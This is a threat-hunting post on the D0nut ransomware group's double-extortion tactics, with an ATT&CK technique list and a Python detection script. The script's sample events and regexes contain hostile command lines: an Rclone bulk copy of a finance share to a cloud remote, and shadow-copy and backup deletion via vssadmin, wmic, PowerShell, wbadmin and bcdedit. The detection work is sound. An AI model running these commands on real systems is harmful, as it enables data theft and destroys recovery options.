#HappyMonday everyone!
As promised, the next installment of "Unveiling the Dark Side: A Deep Dive into Active Ransomware Families" from NCC Group! This time they focus on the #D0nut extortion group, which demands ransoms in return for not leaking stolen data (extortion) and has gone on to apply the double-extortion tactic: exfiltrate the data first, THEN encrypt it. To add insult to injury, the victim is then asked to pay both to decrypt AND to keep the data from being leaked. They use publicly available tools like #CobaltStrike to move laterally through the environment and Rclone to exfiltrate data. Plus, extra bonus points go to Ross Inman for the clever title! Enjoy and Happy Hunting!
D0nut encrypt me, I have a wife and no backups
https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/
Notable MITRE ATT&CK TTPs (credit again goes to the author):
TA0002 - Execution
T1569.002 - System Services: Service Execution (both Cobalt Strike and PsExec)
TA0003 - Persistence
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder
TA0004 - Privilege Escalation
T1055.002 - Process Injection: Portable Executable Injection
TA0005 - Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools
TA0008 - Lateral Movement
T1021.001 - Remote Services: Remote Desktop Protocol
TA0010 - Exfiltration
T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
TA0040 - Impact
T1490 - Inhibit System Recovery
T1486 - Data Encrypted for Impact
Some Cyborg Security Community Edition Hunt Packages to help you start your hunt for this type of activity:
Potential Exfiltration - Common Rclone Arguments
https://hunter.cyborgsecurity.io/research/hunt-package/f075c217-783e-459a-aeb4-42ea91e07af7
Shadow Copies Deletion Using Operating Systems Utilities
https://hunter.cyborgsecurity.io/research/hunt-package/2e3e9910-70c1-4822-804a-ee9919b0c419
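As an added example of the two behaviours those hunt packages target (it is my code, not the NCC Group report's and not the contents of the Cyborg Security packages), here is hunt logic for Rclone bulk-transfer arguments and for shadow-copy deletion through built-in Windows utilities, run over a handful of constructed Sysmon-style process-creation events. The host names, paths and command lines are made up, and the argument lists and regexes are illustrative heuristics you would tune to your own telemetry.

```python
"""Hunt logic for the two behaviours the hunt packages above target:
Rclone invoked with bulk-transfer arguments (exfiltration) and shadow-copy
deletion through built-in Windows utilities (T1490).

Everything here is an added, illustrative example: the events are
constructed Sysmon-style records, not data from the NCC Group report, and
the indicator lists are my heuristics, not the hunt packages' contents.
"""
import re

# Constructed sample events: (host, image, command line)
SAMPLE_EVENTS = [
    ("WS01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n'),
    ("FS01", r"C:\Users\Public\rclone.exe",
     r"rclone.exe copy \\FS01\Finance mega:backup --transfers 16 --ignore-existing --max-age 2y -q"),
    ("FS01", r"C:\Windows\System32\vssadmin.exe",
     r"vssadmin.exe delete shadows /all /quiet"),
    ("DC01", r"C:\Windows\System32\wbem\WMIC.exe",
     r"wmic shadowcopy delete"),
    ("DC01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete()}"'),
    ("WS02", r"C:\Windows\System32\vssadmin.exe", r"vssadmin.exe list shadows"),
    ("WS03", r"C:\Tools\rclone.exe", r"rclone.exe version"),
]

# Rclone subcommands that move data, and switches commonly seen in bulk exfil jobs.
RCLONE_TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_EXFIL_FLAGS = {"--transfers", "--ignore-existing", "--max-age", "--auto-confirm",
                      "--multi-thread-streams", "--no-check-certificate", "-q", "--progress"}
# "<remote>:<path>" as rclone writes it; a drive letter like C:\ has one letter and a backslash.
RCLONE_REMOTE = re.compile(r"[a-z0-9_-]{2,}:[^\\]*")

# Built-in utilities used to destroy shadow copies or inhibit recovery (T1490).
SHADOW_DELETE_PATTERNS = [
    (r"vssadmin(\.exe)?\s+delete\s+shadows", "vssadmin delete shadows"),
    (r"wmic(\.exe)?\s+shadowcopy\s+delete", "wmic shadowcopy delete"),
    (r"win32_shadowcopy.*\.delete\(", "PowerShell Win32_ShadowCopy Delete()"),
    (r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", "wbadmin delete backups"),
    (r"bcdedit(\.exe)?\s.*recoveryenabled\s+no", "bcdedit recoveryenabled no"),
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole; lowercase, unquoted."""
    return [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def rclone_exfil_indicators(image, cmdline):
    """Return evidence strings if this looks like an rclone bulk transfer, else []."""
    tokens = tokenize(cmdline)
    if len(tokens) < 2:
        return []
    subcmd = next((t for t in tokens[1:] if not t.startswith("-")), None)
    if subcmd not in RCLONE_TRANSFER_CMDS:
        return []
    flags = sorted({t.split("=", 1)[0] for t in tokens if t.startswith("-")} & RCLONE_EXFIL_FLAGS)
    remotes = [t for t in tokens[1:] if RCLONE_REMOTE.fullmatch(t)]
    # Key on behaviour, not the file name: attackers routinely rename rclone.exe.
    if not (flags or remotes):
        return []
    evidence = [f"transfer subcommand '{subcmd}'"]
    if image.lower().rsplit("\\", 1)[-1] == "rclone.exe":
        evidence.append("image name rclone.exe")
    if flags:
        evidence.append("exfil-style flags " + " ".join(flags))
    if remotes:
        evidence.append("remote target " + " ".join(remotes))
    return evidence


def shadow_copy_deletion_indicators(cmdline):
    """Return labels of the shadow-copy / recovery-inhibition patterns present in cmdline."""
    lowered = re.sub(r"\s+", " ", cmdline.lower())
    return [label for pattern, label in SHADOW_DELETE_PATTERNS if re.search(pattern, lowered)]


def hunt(events):
    """Run both detections over (host, image, cmdline) events and return the findings."""
    findings = []
    for host, image, cmdline in events:
        if ev := rclone_exfil_indicators(image, cmdline):
            findings.append({"host": host, "technique": "T1048.002", "image": image, "evidence": ev})
        if ev := shadow_copy_deletion_indicators(cmdline):
            findings.append({"host": host, "technique": "T1490", "image": image, "evidence": ev})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f['host']:5} {f['technique']:10} {f['image']}\n      " + "; ".join(f["evidence"]))
```

Two tuning points worth keeping in mind when you take this to real telemetry (Sysmon Event ID 1 or 4688 with command-line auditing enabled): the rclone rule deliberately fires on a transfer subcommand plus a remote or bulk flag rather than on the binary name, so a renamed `rclone.exe` still surfaces, while `rclone version` and `vssadmin list shadows` are ignored as noise; and `vssadmin delete shadows` is also run by legitimate backup tooling, so correlate the hit with the parent process and the user before treating it as T1490.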